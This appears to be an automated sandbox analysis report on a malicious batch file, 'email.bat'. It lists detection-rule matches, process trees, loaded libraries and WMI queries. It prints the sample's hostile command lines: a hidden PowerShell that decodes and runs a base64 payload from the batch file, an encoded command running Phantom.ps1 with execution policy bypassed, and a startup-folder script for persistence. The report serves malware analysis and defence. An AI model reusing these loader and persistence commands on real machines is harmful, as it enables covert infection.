              Source: Process Memory Space: powershell.exe PID: 2908, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: 10.2.PING.EXE.7220000.2.raw.unpack, x0jkepdA6ZackeHF9v.cs | Large array initialization: fc7TaaKHw: array initializer size 361056
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9BA97FD2 NtCreateThreadEx | 2_2_00007FFD9BA97FD2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9BA97FC2 NtWriteVirtualMemory | 2_2_00007FFD9BA97FC2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9BA99DF5 NtCreateThreadEx | 2_2_00007FFD9BA99DF5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9BA99535 NtWriteVirtualMemory | 2_2_00007FFD9BA99535
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFD9BAC8A9D NtCreateThreadEx | 18_2_00007FFD9BAC8A9D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFD9BAC8955 NtWriteVirtualMemory | 18_2_00007FFD9BAC8955
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 18_2_00007FFD9BAC8CCC NtCreateThreadEx | 18_2_00007FFD9BAC8CCC
              Source: 00000017.00000002.2491155636.00000000028E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000000.1728817943.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000006.00000002.2919882763.00000000011B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000012.00000002.1992910476.0000026210CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 0000000A.00000002.2192754630.0000000003120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000002.00000002.1839501596.000001DC171B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: Process Memory Space: powershell.exe PID: 2908, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7496, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 10.2.PING.EXE.7220000.2.raw.unpack, x0jkepdA6ZackeHF9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winBAT@40/34@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Phantom.ps1
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
              Source: C:\Windows\SysWOW64\PING.EXE | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
              Source: C:\Windows\SysWOW64\PING.EXE | Mutant created: \Sessions\1\BaseNamedObjects\5f4d3b53c7f75d94
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1ywjns4.ya0.ps1
              Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" "
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ping.exe")
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ping.exe")
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ping.exe")
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\SysWOW64\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: email.batVirustotal: Detection: 11%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA2A.tmp" "c:\Users\user\AppData\Local\Temp\mlbsu2za\CSCA5922EEFCE0C4CCF862EBFA9D2B24469.TMP"Jump to behavior
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat" "Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -tJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23DA.tmp" "c:\Users\user\AppData\Local\Temp\fhrgxrvn\CSCCE48297965FB4312A543AE9B3ACACFC0.TMP"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EXec BYPass -FIle C:\Users\user\AppData\Local\Phantom.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM ping.exe /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES50A7.tmp" "c:\Users\user\AppData\Local\Temp\CSC45E487DD8415477BBDD6263064315E51.TMP"
              Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exe | Section loaded: mscoree.dll
              Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\explorer.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\explorer.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: version.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: edputil.dll
